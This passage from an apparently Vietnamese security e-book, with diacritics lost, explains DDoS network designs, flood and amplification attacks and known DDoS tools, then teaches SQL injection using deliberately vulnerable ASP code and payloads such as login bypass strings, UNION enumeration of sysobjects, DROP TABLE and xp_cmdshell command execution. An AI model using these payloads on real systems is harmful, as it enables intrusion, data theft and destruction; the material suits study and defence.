- Attacker s t Client giao tip vi cc1 Handler xc nh s lng Agent ang

online, iu chnh thi im tn cng v cp nht cc Agent. Ty theo cch attacker
cu hnh attack-network, cc Agent s chu s qun l ca mt hay nhiu Handler.
- Thng thng Attacker s t Handler software trn mt Router hay mt server c
lng traffic lu thng nhiu. Vic ny nhm lm cho cc giao tip gia Client,
handler v Agent kh b pht hin. Cc gia tip ny thng thng xy ra trn cc
protocol TCP, UDP hay ICMP. Ch nhn thc s ca cc Agent thng thng khng
h hay bit h b li dng vo cuc tn cng kiu DDoS, do h khng kin thc
hoc cc chng trnh Backdoor Agent ch s dng rt t ti nguyn h thng lm cho
hu nh khng th thy nh hng g n hiu nng ca h thng.
ii. M hnh IRC Based:
- Internet Relay Chat (IRC) l mt h thng online chat multiuser, IRC cho php
User to mt kt ni n multipoint n nhiu user khc v chat thi gian thc. Kin
trc c IRC network bao gm nhiu IRC server trn khp internet, giao tip vi nhau
trn nhiu knh (channel). IRC network cho php user to ba loi channel: public,
private v serect.
Public channel: Cho php user ca channel thy IRC name v nhn c
message ca mi user khc trn cng channel
Private channel: c thit k giao tip vi cc i tng cho php. Khng cho
php cc user khng cng channel thy IRC name v message trn channel. Tuy nhin,
nu user ngoi channel dng mt s lnh channel locator th c th bit c s tn ti
ca private channel .
Secrect channel : tng t private channel nhng khng th xc nh bng channel
locator.

Tav4 Bkav Forum

Trang 20

[E-book] Tan cong va phong thu ung dung WEB

Attacker

Attacker

IRC NETWORK

Agent

Agent

Agent

Agent

Agent

Victim
Hnh 4. Kin trc attack-network ca kiu IRC-Base
- IRC Based net work cng tng t nh Agent Handler network nhng m hnh
ny s dng cc knh giao tip IRC lm phng tin giao tip gia Client v Agent
(khng s dng Handler). S dng m hnh ny, attacker cn c thm mt s li th
khc nh:
Cc giao tip di dng chat message lm cho vic pht hin chng l v cng kh
khn
IRC traffic c th di chuyn trn mng vi s lng ln m khng b nghi ng
Khng cn phi duy tr danh sch cc Agent, hacker ch cn logon vo IRC server l
c th nhn c report v trng thi cc Agent do cc channel gi v.
Sau cng: IRC cng l mt mi trng file sharing to iu kin pht tn cc Agent
code ln nhiu my khc.
2.2.2.3. Phn loi tn cng kiu DDOS
- Nhn chung, c rt nhiu bin th ca k thut tn cng DDoS nhng nu nhn di
gc chuyn mn th c th chia cc bin th ny thnh hai loi da trn mch ch
tn cng: Lm cn kit bng thng v lm cn kit ti nguyn h thng

Tav4 Bkav Forum

Trang 21

[E-book] Tan cong va phong thu ung dung WEB

DDoS attack

Bandwith
DeleptionDeleption

Flood Attack

Resource Deleption

Amplification

Protoco
l

Attack

Exploit

Malformed
Paclket
attack

Attack
UDP

ICMP

Smuft

Flaggle

attack

Attack

TCP
SYS

Attack

PUSH

IP @

+ACK

Attack

IP Packet
Options
Attack

SYN
Rando
m

Static

Spoof

Direct

Loop

Port

Source

Attack

Attack

Attack

Attack

Port

Attack
Spoof

Spoof

Spoof

Spoof

source

source

source

source

Attack

Hnh 5. Phn loi cc kiu tn cng

DDoS
Attack
Attack
Attack
Attack
i. Nhng kiu tn cng lm cn kit bng thng ca mng (BandWith Depletion
Attack)
- BandWith Depletion Attack c thit k nhm lm trng ngp mng mc tiu vi
nhng traffic khng cn thit, vi mc ch lm gim ti thiu kh nng ca cc traffic
hp l n c h thng cung cp dch v ca mc tiu.
- C hai loi BandWith Depletion Attack:
+ Flood attack: iu khin cc Agent gi mt lng ln traffic n h thng dch v
ca mc tiu, lm dch v ny b ht kh nng v bng thng.
+ Amplification attack: iu khin cc agent hay Client t gi message n mt a
ch IP broadcast, lm cho tt c cc my trong subnet ny gi message n h thng
dch v ca mc tiu. Phng php ny lm gia tng traffic khng cn thit, lm suy
gim bng thng ca mc tiu.
Flood attack:
Trong phng php ny, cc Agent s gi mt lng ln IP traffic lm h thng dch
v ca mc tiu b chm li, h thng b treo hay t n trng thi hot ng bo ha.
Lm cho cc User thc s ca h thng khng s dng c dch v.
Ta c th chia Flood Attack thnh hai loi:
+ UDP Flood Attack: do tnh cht connectionless ca UDP, h thng nhn UDP
message ch n gin nhn vo tt c cc packet mnh cn phi x l. Mt lng ln

Tav4 Bkav Forum

Trang 22

[E-book] Tan cong va phong thu ung dung WEB

cc UDP packet c gi n h thng dch v ca mc tiu s y ton b h thng
n ngng ti hn.
+ Cc UDP packet ny c th c gi n nhiu port ty hay ch duy nht mt port.
Thng thng l s gi n nhiu port lm cho h thng mc tiu phi cng ra x
l phn hng cho cc packet ny. Nu port b tn cng khng sn sng th h thng
mc tiu s gi ra mt ICMP packet loi destination port unreachable. Thng thng
cc Agent software s dng a ch IP gi che giu hnh tung, cho nn cc message
tr v do khng c port x l s dn n mt i ch Ip khc. UDP Flood attack cng
c th lm nh hng n cc kt ni xung quanh mc tiu do s hi t ca packet
din ra rt mnh.
+ ICMP Flood Attack: c thit k nhm mc ch qun l mng cng nh nh v
thit b mng. Khi cc Agent gi mt lng ln ICMP_ECHO_REPLY n h thng
mc tiu th h thng ny phi reply mt lng tng ng Packet tr li, s dn n
nghn ng truyn. Tng t trng hp trn, a ch IP ca c Agent c th b gi
mo.
+Amplification Attack:
- Amplification Attack nhm n vic s dng cc chc nng h tr a ch IP
broadcast ca cc router nhm khuych i v hi chuyn cuc tn cng. Chc nng
ny cho php bn gi ch nh mt a ch IP broadcast cho ton subnet bn nhn thay
v nhiu a ch. Router s c nhim v gi n tt c a ch IP trong subnet packet
broadcast m n nhn c.
- Attacker c th gi broadcast message trc tip hay thng qua mt s Agent nhm
lm gia tng cng ca cuc tn cng. Nu attacker trc tip gi message, th c
th li dng cc h thng bn trong broadcast network nh mt Agent.

Tav4 Bkav Forum

Trang 23

[E-book] Tan cong va phong thu ung dung WEB

Attacker/Agent

VICTIM

Amplifier

Amplifier Network System

Hnh 6. S tn cng kiu Amplification Attack

C th chia amplification attack thnh hai loi, Smuft va Fraggle attack:
+ Smuft attack: trong kiu tn cng ny attacker gi packet n network amplifier
(router hay thit b mng khc h tr broadcast), vi a ch ca nn nhn. Thng
thng nhng packet c dng l ICMP ECHO REQUEST, cc packet ny yu cu
yu cu bn nhn phi tr li bng mt ICMP ECHO REPLY packet. Network
amplifier s gi n ICMP ECHO REQUEST packet n tt c cc h thng thuc a
ch broadcast v tt c cc h thng ny s REPLY packet v a ch IP ca mc tiu
tn cng Smuft Attack.
+ Fraggle Attack: tng t nh Smuft attack nhng thay v dng ICMP ECHO
REQUEST packet th s dng UDP ECHO packet gi m mc tiu. Tht ra cn mt
bin th khc ca Fraggle attack s gi n UDP ECHO packet n chargen port (port
19/UNIX) ca mc tiu, vi a ch bn gi l echo port (port 7/UNIX) ca mc tiu,
to nn mt vng lp v hn. Attacker pht ng cuc tn cng bng mt ECHO
REQUEST vi a ch bn nhn l mt a ch broadcast, ton b h thng thuc a
ch ny lp tc gi REPLY n port echo ca nn nhn, sau t nn nhn mt ECHO

Tav4 Bkav Forum

Trang 24

[E-book] Tan cong va phong thu ung dung WEB

REPLY li gi tr v a ch broadcast, qu trnh c th tip din. y chnh l nguyn
nhn Flaggle Attack nguy him hn Smuft Attack rt nhiu.
ii. Nhng kiu tn cng lm cn kit ti nguyn: (Resource Deleption Attack)
- Theo nh ngha: Resource Deleption Attack l kiu tn cng trong Attacker gi
nhng packet dng cc protocol sai chc nng thit k, hay gi nhng packet vi dng
lm tt nghn ti nguyn mng lm cho cc ti nguyn ny khng phc v user
thng thng khc c.
ii.a/ Protocol Exploit Attack:
+ TCP SYS Attack: Transfer Control Protocol h tr truyn nhn vi tin cy cao
nn s dng phng thc bt tay gia bn gi v bn nhn trc khi truyn d liu.
Bc u tin, bn gi gi mt SYN REQUEST packet (Synchronize). Bn nhn nu
nhn c SYN REQUEST s tr li bng SYN/ACK REPLY packet. Bc cui
cng, bn gi s truyn packet cui cng ACK v bt u truyn d liu.
SYS

TCP

TCP

SYN/ACK

Client
ACK
Client Port

80

Server

Hnh 7. Kiu tn cng TCP SYS Attack

1024-65535

- Nu bn server tr li mt yu cu SYN bng mt SYN/ACK REPLY nhng

Service
khng nhn c ACK packet cui cng sau mt khong thi gian quy
nhPort
th n s

resend li SYN/ACK REPLY cho n ht thi gian timeout. Ton b 1-1023

ti nguyn h
thng d tr x l phin giao tip nu nhn c ACK packet cui cng s b
phong ta cho n ht thi gian timeout.
- Nm c im yu ny, attacker gi mt SYN packet n nn nhn vi a ch
bn gi l gi mo, kt qu l nn nhn gi SYN/ACK REPLY n mt a ch kh v
s khng bao gi nhn c ACK packet cui cng, cho n ht thi gian timeout nn
nhn mi nhn ra c iu ny v gii phng cc ti nguyn h thng. Tuy nhin, nu
lng SYN packet gi mo n vi s lng nhiu v dn dp, h thng ca nn nhn
c th b ht ti nguyn.

Tav4 Bkav Forum

Trang 25

[E-book] Tan cong va phong thu ung dung WEB

Client

Server

Attacker/Agent

Server

SYN

SYN

SYN/ACK

SYN/ACK
SYN/ACK

ACK

Hnh 8. Attacker gi mo Ip
+ PUSH = ACK Attack: Trong TCP protocol, cc packet c cha trong buffer, khi
buffer y th cc packet ny s c chuyn n ni cn thit. Tuy nhin, bn gi c
th yu cu h thng unload buffer trc khi buffer y bng cch gi mt packet vi
PUSH v ACK mang gi tr l 1. Nhng packet ny lm cho h thng ca nn nhn
unload tt c d liu trong TCP buffer ngay lp tc v gi mt ACK packet tr v khi
thc hin xong iu ny, nu qu trnh c din ra lin tc vi nhiu Agent, h thng
s khng th x l c lng ln packet gi n v s b treo.
ii.b/ Malformed Packet Attack:
- Malformed Packet Attack l cch tn cng dng cc Agent gi cc packet c cu
trc khng ng chun nhm lm cho h thng ca nn nhn b treo.
C hai loi Malformed Packet Attack:
+ IP address attack: dng packet c a ch gi v nhn ging nhau lm cho h iu
hnh ca nn nhn khng x l ni v b treo.
+ IP packet options attack ngu nhin ha vng OPTION trong IP packet v thit lp
tt c cc bit QoS ln 1, iu ny lm cho h thng ca nn nhn phi tn thi gian
phn tch, nu s dng s lng ln Agent c th lm h thng nn nhn ht kh nng
x l.
ii.c/ Mt s c tnh ca cng c DdoS attack:

Tav4 Bkav Forum

Trang 26

[E-book] Tan cong va phong thu ung dung WEB

DDoS software Tool
Attack
Network

Agent Setup

OS supported

Comminication
Instalation

Hide with rootkit

Protocol

Encruption Agent
Activation

Unix

Solaris Linux Windows

Methods
Active

Yes

Passive

No
TCP UDP

Bugged Corrupted
website

Backdoor Trojan

File

Buffer Overlfow

Actively
Poll

Live&wait

ICMP

YES
Agent

IRC

Handlerl

Basedl

Client

Agent

Private/Serect

None

No
Public

Handlerl
Hnh 9. Mt s c
tnh caHandlerl
cng c DdoS attack

- C rt nhiu im chung v mt software ca cc cng c DDoS attack. C th k

ra mt s im chung nh: cch ci Agent software, phng php giao tip gia cc
attacker, handler v Agent, im chung v loi h iu hnh h tr cc cng c ny. S
trn m t s so snh tng quan gia cc cng c tn cng DDoS ny.
* Cch thc ci t DDoS Agent:
- Attacker c th dng phng php active v passive ci t agent software ln
cc my khc nhm thit lp attack-network kiu Agent-Handler hay IRC-based.
- Cch ci t Active:
+ Scaning: dng cc cng c nh Nmap, Nessus tm nhng s h trn cc h thng
ang online nhm ci t Agentsoftware. Ch , Nmap s tr v nhng thng tin v
mt h thng c ch nh bng a ch IP, Nessus tm kim t nhng a ch IP
bt k v mt im yu bit trc no .
+ Backdoor: sau khi tm thy c danh sch cc h thng c th li dng, attacker s
tin hnh xm nhp v ci Agentsoftware ln cc h thng ny. C rt nhiu thng tin
sn c v cch thc xm nhp trn mng, nh site ca t chc Common Vulnerabilities
and Exposures (CVE), y lit k v phn loi trn 4.000 loi li ca tt c cc h
thng hin c. Thng tin ny lun sn sng cho c gii qun tr mng ln hacker.

Tav4 Bkav Forum

Trang 27

[E-book] Tan cong va phong thu ung dung WEB

+ Trojan: l mt chng trnh thc hin mt chc nng thng thng no , nhng
li c mt s chc nng tim n phc v cho mc ch ring ca ngi vit m ngi
dng khng th bit c. C th dng trojan nh mt Agent software.
+ buffer Overflow: tn dng li buffer overflow, attacker c th lm cho chu trnh thc
thi chng trnh thng thng b chuyn sang chu trnh thc thi chng trnh ca
hacker (nm trong vng d liu ghi ). C th dng cch ny tn cng vo mt
chng trnh c im yu buffer overflow chy chng trnh Agent software.
- Cch ci t passive:
+ Bug Website: attacker c th li dng mt s li ca web brower ci Agent
software vo my ca user truy cp. Attaker s to mt website mang ni dung tim n
nhng code v lnh t by user. Khi user truy cp ni dung ca website, th
website download v ci t Agent software mt cch b mt. Microsoft Internet
Explorer web browser thng l mc tiu ca cch ci t ny, vi cc li ca ActiveX
c th cho php IE brower t ng download v ci t code trn my ca user duyt
web.
+ Corrupted file: mt phng php khc l nhng code vo trong cc file thng
thng. Khi user c hay thc thi cc file ny, my ca h lp tc b nhim Agent
software. Mt trong nhng k thut ph bin l t tn file rt di, do default ca cc
h iu hnh ch hin th phn u ca tn file nn attacker c th gi km theo email
cho nn nhn file nh sau: iloveyou.txt_hiiiiiii_NO_this_is_DDoS.exe, do ch thy
phn Iloveyou.txt hin th nn user s m file ny c v lp tc file ny c
thc thi v Agent code c ci vo my nn nhn. Ngoi ra cn nhiu cch khc nh
ngy trang file, ghp file
- Rootkit: l nhng chng trnh dng xa du vt v s hin din ca Agent hay
Handler trn my ca nn nhn. Rootkit thng c dng trn Hander software
c ci, ng vai tr xung yu cho s hot ng ca attack-network hay trn cc mi
trng m kh nng b pht hin ca Handler l rt cao. Rootkit rt t khi dng trn cc
Agent do mc quan trng ca Agent khng cao v nu c mt mt s Agent cng
khng nh hng nhiu n attack-network.
* Giao tip trn Attack-Network:
- Protocol: giao tip trn attack-network c th thc hin trn nn cc protocol TCP,
UDP, ICMP.
- M ha cc giao tip: mt vi cng c DDoS h tr m ha giao tip trn ton b
attack-network. Ty theo protocol c s dng giao tip s c cc phng php
Tav4 Bkav Forum

Trang 28

[E-book] Tan cong va phong thu ung dung WEB

m ha thch hp. Nu attack-network dng IRC-based th private v secrect channel
h tr m ha giao tip.
- Cch kch hot Agent: c hai phng php ch yu kch hot Agent. Cch th
nht l Agent s thng xuyn qut thm d Handler hay IRC channel nhn ch th
(active Agent). Cch th hai l Agent ch n gin l nm vng ch ch th t
Handler hay IRC Channel.
ii.d. Mt s cng c DDoS:
Da trn nn tng chung ca phn trn, c nhiu cng c c vit ra, thng
thng cc cng c ny l m ngun m nn mc phc tp ngy cng cao v c
nhiu bin th mi l.
* Cng c DDoS dng Agent Handler:
- TrinOO: l mt trong cc cng c DDoS u tin c pht tn rng ri.
TrinOO c kin trc Agent Handler, l cng c DDoS kiu Bandwidth Depletion
Attack, s dng k thut UDP flood. Cc version u tin ca TrinOO khng h tr
gi mo a ch IP. TrinOO Agent c ci t li dng li remote buffer overrun.
Hot ng trn h iu hnh Solaris 2.5.1 Red Hat Linux 6.0. Attack network giao
tip dng TCP (attacker client v handler) v UDP (Handler v Agent). M ha giao
tip dng phng php m ha i xng gia Client, handler v Agent.
- Tribe Flood Network (TFN): Kiu kin trc Agent Handler, cng c DDoS ho
tr kiu Bandwidth Deleption Attack v Resourse Deleption Attack. S dng k thut
UDP flood, ICMP Flood, TCP SYN v Smurf Attack. Cc version u tin khng h
tr gi mo a ch IP, TFN Agent c ci t li dng li buffer overflow. Hot ng
trn h iu hnh Solaris 2.x v Red Hat Linux 6.0. Attack Network giao tip dng
ICMP ECHO REPLY packet (TFN2K h tr thm TCP/UDP vi tnh nng chn
protocol ty ), khng m ha giao tip (TFN2K h tr m ha)
- Stacheldraht: l bin th ca TFN c thm kh nng updat Agent t ng. Giao tip
telnet m ha i xng gia Attacker v Handler.
- Shaft: l bin th ca TrinOO, giao tip Handler Agent trn UDP, Attacker
Hendle trn Internet. Tn cng dng k thut UDP, ICMP v TCP flood. C th tn
cng phi hp nhiu kiu cng lc. C thng k chi tit cho php attacker bit tnh
trng tn tht ca nn nhn, mc quy m ca cuc tn cng iu chnh s lng
Agent.
* Cng c DDoS dng IRC Based:

Tav4 Bkav Forum

Trang 29

[E-book] Tan cong va phong thu ung dung WEB

Cng c DDoS dng IRC-based c pht trin sau cc cng c dng Agent
Handler. Tuy nhin, cng c DDoS dng IRC phc tp hn rt nhiu, do tch hp rt
nhiu c tnh ca cc cng c DDoS dng Agent Handler.
- Trinity: l mt in hnh ca cng c dng ny. Trinity c hu ht cc k thut tn
cng bao gm: UDP, TCP SYS, TCP ACK, TCP fragment, TCP NULL, TCP RST,
TCP random flag, TCP ESTABLISHED packet flood. N c sn kh nng ngu nhin
ha a ch bn gi. Trinity cng h tr TCP flood packet vi kh nng ngu nhn tp
CONTROL FLAG. Trinity c th ni l mt trong s cc cng c DDoS nguy him
nht.
- Ngoi ra c th nhc thm v mt s cng c DDoS khc nh Knight, c thit k
chy trn Windows, s dng k thut ci t ca troijan back Orifice. Knight dng cc
k thut tn cng nh SYV, UDP Flood v Urgent Pointer Flooder.
- Sau cng l Kaiten, l bin th ca Knight, h tr rt nhiu k thut tn cng nh:
UDP, TCP flood, SYN, PUSH + ACK attack. Kaiten cng tha hng kh nng ngu
nhin ha a ch gi mo ca Trinity.
2.2.3. Tn cng t chi dch v phn x nhiu vng DRDoS (Distributed
Reflection Denial of Service)
Xut hin vo u nm 2002, l kiu tn cng mi nht, mnh nht trong h DoS.
Nu c thc hin bi k tn cng c tay ngh th c th h gc bt c h thng pht
chc
- Mc tiu chnh ca DDDoS l chim ot ton b bng thng ca my ch, tc l
lm tc ngn hon ton ng kt ni t my ch vo xng sng ca Internet v tiu
hao ti nguyn my ch. Trong sut qu trnh my ch b tn cng bng DrDoS, khng
mt my khch no ch th kt ni c vo my ch . Tt c cc dch v chy trn
nn TCP/IP nh DNS, HTTP, FTP, POP3, ... u b v hiu ha.
- V c bn, DrDoS l s phi hp gia hai kiu DoS v DDoS. N c kiu tn
cng SYN vi mt my tnh n, va c s kt hp gia nhiu my tnh chim
dng bng thng nh kiu DDoS. K tn cng thc hin bng cch gi mo a ch ca
server mc tiu ri gi yu cu SYN n cc server ln nh Yahoo,Micorosoft,
cc server ny gi cc gi tin SYN/ACK n server mc tiu. Cc server ln, ng
truyn mnh v tnh ng vai tr zoombies cho k tn cng nh trong DdoS

Tav4 Bkav Forum

Trang 30

[E-book] Tan cong va phong thu ung dung WEB

Hnh 10. S m t kiu tn cng DRDOS

- Qu trnh gi c lp li lin tc vi nhiu a ch IP gip t k tn cng, vi nhiu
server ln tham gia nn server mc tiu nhanh chng b qu ti, bandwidth b chim
dng bi server ln. Tnh ngh thut l ch ch cn vi mt my tnh vi modem
56kbps, mt hacker lnh ngh c th nh bi bt c my ch no trong giy lt m
khng cn chim ot bt c my no lm phng tin thc hin tn cng.
2.3. SQL Injection
2.3.1. Tn cng SQL injection
2.3.1.1. SQL Injection l g?
- Khi trin khai cc ng dng web trn Internet, nhiu ngi vn ngh rng vic m
bo an ton, bo mt nhm gim thiu ti a kh nng b tn cng t cc tin tc ch
n thun tp trung vo cc vn nh chn h iu hnh, h qun tr c s d liu,
webserver s chy ng dng, ... m qun mt ng ngay c bn thn ng dng chy trn
cng tim n mt l hng bo mt rt ln. Mt trong s cc l hng ny l SQL
injection. Ti Vit Nam, qua thi k cc qun tr website l l vic qut virus, cp
nht cc bn v li t cc phn mm h thng, nhng vic chm sc cc li ca cc
ng dng li rt t c quan tm. l l do ti sao trong thi gian va qua, khng t
Tav4 Bkav Forum

Trang 31

[E-book] Tan cong va phong thu ung dung WEB

website ti Vit Nam b tn cng v a s u l li SQL injection. Vy SQL injection
l g ?
- SQL injection l mt k thut cho php nhng k tn cng li dng l hng trong
vic kim tra d liu nhp trong cc ng dng web v cc thng bo li ca h qun tr
c s d liu "tim vo" (inject) v thi hnh cc cu lnh SQL bt hp php (khng
c ngi pht trin ng dng lng trc). Hu qu ca n rt tai hi v n cho
php nhng k tn cng c th thc hin cc thao tc xa, hiu chnh, do c ton
quyn trn c s d liu ca ng dng, thm ch l server m ng dng ang chy.
Li ny thng xy ra trn cc ng dng web c d liu c qun l bng cc h
qun tr c s d liu nh SQL Server, MySQL, Oracle, DB2, Sysbase.
2.3.1.2. Cc Dng Tn Cng SQL Injection
- C bn dng thng thng bao gm: vt qua kim tra lc ng nhp
(authorization bypass), s dng cu ln SELECT, s dng cu lnh INSERT, s dng
cc stored-procedures.
- bit cc website bn hng s dng CSDL SQL ta s dng cc soft hoc cc
cng c tm li.Hoc cc cng c tm kim nh Google.V dng cc Dork tm kim
nh : inurl : product.php?id=

Hnh 11. Mt tools tm site li Online

Tav4 Bkav Forum

Trang 32

[E-book] Tan cong va phong thu ung dung WEB

- bit website no dnh li SQL Injection ta thm du vo sau thanh a ch.

V d : http://www.doanchuyenganh.com/product.php?id=123

Hnh 12. Mt site b li SQL Injection

i. Dng tn cng vt qua kim tra ng nhp
- Vi dng tn cng ny, tin tc c th d dng vt qua cc trang ng nhp nh vo
li khi dng cc cu lnh SQL thao tc trn c s d liu ca ng dng web.
Xt mt v d in hnh, thng thng cho php ngi dng truy cp vo cc trang
web c bo mt, h thng thng xy dng trang ng nhp yu cu ngi dng
nhp thng tin v tn ng nhp v mt khu. Sau khi ngi dng nhp thng tin vo,
h thng s kim tra tn ng nhp v mt khu c hp l hay khng quyt nh cho
php hay t chi thc hin tip. Trong trng hp ny, ngi ta c th dng hai trang,
mt trang HTML hin th form nhp liu v mt trang ASP dng x l thng tin
nhp t pha ngi dng. V d: login.htm
<form action="ExecLogin.asp" method="post">
Username: <input type="text" name="fUSRNAME"><br>
Password: <input type="password" name="fPASSWORD"><br>
<input type="submit">
</form>
execlogin.asp
<%
Dim vUsrName, vPassword, objRS, strSQL
vUsrName = Request.Form("fUSRNAME")
vPassword = Request.Form("fPASSWORD")

Tav4 Bkav Forum

Trang 33

[E-book] Tan cong va phong thu ung dung WEB

strSQL = "SELECT * FROM T_USERS " & _
"WHERE USR_NAME=' " & vUsrName & _
" ' and USR_PASSWORD=' " & vPassword & " ' "
Set objRS = Server.CreateObject("ADODB.Recordset")
objRS.Open strSQL, "DSN=..."
If (objRS.EOF) Then
Response.Write "Invalid login."
Else
Response.Write "You are logged in as " & objRS("USR_NAME")
End If
Set objRS = Nothing
%>
- Thot nhn, on m trong trang execlogin.asp dng nh khng cha bt c mt
l hng v an ton no. Ngi dng khng th ng nhp m khng c tn ng nhp
v mt khu hp l. Tuy nhin, on m ny thc s khng an ton v l tin cho
mt li SQL injection. c bit, ch s h nm ch d liu nhp vo t ngi dng
c dng xy dng trc tip cu lnh SQL. Chnh iu ny cho php nhng k tn
cng c th iu khin cu truy vn s c thc hin. V d, nu ngi dng nhp
chui sau vo trong c 2 nhp liu username/password ca trang login.htm l: ' OR '
' = ' '. Lc ny, cu truy vn s c gi thc hin l:
SELECT * FROM T_USERS WHERE USR_NAME

=''

OR

''=''

and

USR_PASSWORD= '' OR ''=''

- Cu truy vn ny l hp l v s tr v tt c cc bn ghi ca T_USERS v on m
tip theo x l ngi dng ng nhp bt hp php ny nh l ngi dng ng nhp
hp l.
ii. Dng tn cng s dng cu lnh SELECT
- Dng tn cng ny phc tp hn. thc hin c kiu tn cng ny, k tn cng
phi c kh nng hiu v li dng cc s h trong cc thng bo li t h thng d
tm cc im yu khi u cho vic tn cng. Xt mt v d rt thng gp trong cc
website v tin tc. Thng thng, s c mt trang nhn ID ca tin cn hin th ri
sau truy vn ni dung ca tin c ID ny.
V d: http://www.doanchuyennganh.com/product.asp?ID=123 . M ngun cho
chc nng ny thng c vit kh n gin theo dng
<%
Dim vNewsID, objRS, strSQL
vNewsID = Request("ID")
strSQL = "SELECT * FROM T_NEWS WHERE NEWS_ID =" & vNewsID
Set objRS = Server.CreateObject("ADODB.Recordset")
objRS.Open strSQL, "DSN=..."
Tav4 Bkav Forum

Trang 34

[E-book] Tan cong va phong thu ung dung WEB

Set objRS = Nothing
%>
- Trong cc tnh hung thng thng, on m ny hin th ni dung ca tin c ID
trng vi ID ch nh v hu nh khng thy c li. Tuy nhin, ging nh v d
ng nhp trc, on m ny l s h cho mt li SQL injection khc. K tn
cng c th thay th mt ID hp l bng cch gn ID cho mt gi tr khc, v t ,
khi u cho mt cuc tn cng bt hp php, v d nh: 0
OR 1=1 (ngha l, http://www.doanchuyennganh.com/product.asp?ID=0 or 1=1).
- Cu truy vn SQL lc ny s tr v tt c cc article t bng d liu v n s thc
hin cu lnh:
SELECT * FROM T_NEWS WHERE NEWS_ID=0 or 1=1
- Mt trng hp khc, v d nh trang tm kim. Trang ny cho php ngi dng
nhp vo cc thng tin tm kim nh H, Tn, on m thng gp l:
<%
Dim vAuthorName, objRS, strSQL
vAuthorName = Request("fAUTHOR_NAME")
strSQL = "SELECT * FROM T_AUTHORS WHERE AUTHOR_NAME =' " & _
vAuthorName & " ' "
Set objRS = Server.CreateObject("ADODB.Recordset")
objRS.Open strSQL, "DSN=..."

Set objRS = Nothing

%>
- Tng t nh trn, tin tc c th li dng s h trong cu truy vn SQL nhp
vo trng tn tc gi bng chui gi tr:
' UNION SELECT ALL SELECT OtherField FROM OtherTable WHERE ' '='
- Lc ny, ngoi cu truy vn u khng thnh cng, chng trnh s thc hin thm
lnh tip theo sau t kha UNION na.
- Tt nhin cc v d ni trn, dng nh khng c g nguy him, nhng hy th
tng tng k tn cng c th xa ton b c s d liu bng cch chn vo cc on
lnh nguy him nh lnh DROP TABLE.
V d nh: ' DROP TABLE T_AUTHORS -- Chc cc bn s thc mc l lm sao bit c ng dng web b li dng ny c.
Rt n gin, hy nhp vo chui (*) nh trn, nu h thng bo li v c php dng:
Invalid object name OtherTable; ta c th bit chc l h thng thc hin cu
SELECT sau t kha UNION, v nh vy mi c th tr v li m ta c tnh to ra
trong cu lnh SELECT.
- Cng s c thc mc l lm th no c th bit c tn ca cc bng d liu m
thc hin cc thao tc ph hoi khi ng dng web b li SQL injection. Cng rt n
Tav4 Bkav Forum

Trang 35

[E-book] Tan cong va phong thu ung dung WEB

gin, bi v trong SQL Server, c hai i tng l sysobjects v syscolumns cho php
lit k tt c cc tn bng v ct c trong h thng. Ta ch cn chnh li cu lnh
SELECT, v d nh:
' UNION SELECT name FROM sysobjects WHERE xtype = 'U' l c th lit k c
tn tt c cc bng d liu.
iii. Dng tn cng s dng cu lnh INSERT
- Thng thng cc ng dng web cho php ngi dng ng k mt ti khon
tham gia. Chc nng khng th thiu l sau khi ng k thnh cng, ngi dng c th
xem v hiu chnh thng tin ca mnh. SQL injection c th c dng khi h thng
khng kim tra tnh hp l ca thng tin nhp vo.
V d, mt cu lnh INSERT c th c c php dng:
INSERT INTO TableName VALUES('Value One', 'Value Two', 'Value Three').
Nu on m xy dng cu lnh SQL c dng :
<%
strSQL = "INSERT INTO TableName VALUES(' " & strValueOne & " ', ' " _
& strValueTwo & " ', ' " & strValueThree & " ') "
Set objRS = Server.CreateObject("ADODB.Recordset")
objRS.Open strSQL, "DSN=..."

Set objRS = Nothing

%>
- Th chc chn s b li SQL injection, bi v nu ta nhp vo trng th nht v d
nh: ' + (SELECT TOP 1 FieldName FROM TableName) + '. Lc ny cu truy vn s
l: INSERT INTO TableName VALUES(' ' + (SELECT TOP 1 FieldName FROM
TableName) + ' ', 'abc', 'def'). Khi , lc thc hin lnh xem thng tin, xem nh bn
yu cu thc hin thm mt lnh na l: SELECT TOP 1 FieldName FROM
TableName
iiii. Dng tn cng s dng stored-procedures
- Vic tn cng bng stored-procedures s gy tc hi rt ln nu ng dng c
thc thi vi quyn qun tr h thng 'sa'.
- V d: nu ta thay on m tim vo dng: ' ; EXEC xp_cmdshell cmd.exe dir C: '.
- Lc ny h thng s thc hin lnh lit k th mc trn a C:\ ci t server.
- Vic ph hoi kiu no tu thuc vo cu lnh ng sau cmd.exe. Nu ci SQL
Server ch mc nh th SQL Server chy trn nn SYSTEM, tng ng mc
truy cp Windows. C th dng master..xp_cmdshell thi hnh lnh t xa:
; exec master..xp_cmdshell 'ping 10.10.1.2'--

Tav4 Bkav Forum

Trang 36

[E-book] Tan cong va phong thu ung dung WEB

Th dng du nhy i (") nu du nhy n (') khng lm vic.
Di y l mt s extended stored procedure m hacker thng hay s dng thc
thi nhng cu lnh xem ni dung thng tin trong my nn nhn:
Xp_availablemedia: Hin th nhng a hin hnh trn my
Xp_dirtree: Hin th tt c cc th mc k c th mc con
Xp_loginconfig: Ly thng tin v ch bo mt trn server
Xp_makecab: Cho php ngi s dng to cc tp tin lu tr trn Server (hay bt c
tp tin no m server c th truy xut
Xp_ntsec_enumdomain: lit k nhng domain m server c th truy vn.
Xp_terminate_process: chm dt mt tin trnh vi tham s PID ca n.
iiiii. Tn cng SQL Injection nng cao.
Chui k t khng c du nhy n:
- Nhng nh lp trnh c th bo v ng dng ca h bng cch loi b tt c du
nhy, thng thng loi b du nhy bng cch thay mt du nhy thnh 2 du nhy.
V d a.1 :
function escape( input )
input = replace(input, "'", "''")
escape = input
R rng l, n ngn chn c tt c nhng kiu tn cng trn. Tuy nhin nu mun
end function
to ra mt chui gi tr m khng dng cc du nhy, c th dng hm char() nh v
d sau:
V d a.2:
INSERT into User VALUES(666, char(0x63) +char(0x68)
+char(0x72) char(0x69) +char(0x73) ,char(0x63) +char(0x68)
V d a.2 trn tuy l mt cu truy vn khng c du nhy n no nhng n vn c
+char(0x72)
+char(0x73),0xffff)
th insert
chui vo+char(0x69)
bng, v tng
ng vi:
INSERT into User VALUES( 666,chris,chris,255)
Hacker cng c th chn username , password l s trnh du nhy nh v d sau:
V d a.3:
INSERT into User VALUES( 667,123,123,0xffff)
Tav4 Bkav Forum

Trang 37

[E-book] Tan cong va phong thu ung dung WEB

SQL server s t ng chuyn t s sang chui.
Tn cng 2 tng:
- Mc d ng dng thay th du nhy n nhng vn cn kh nng b chn on
m SQL .
V d b.1: ng k account trong ng dng, nhp username nh sau:
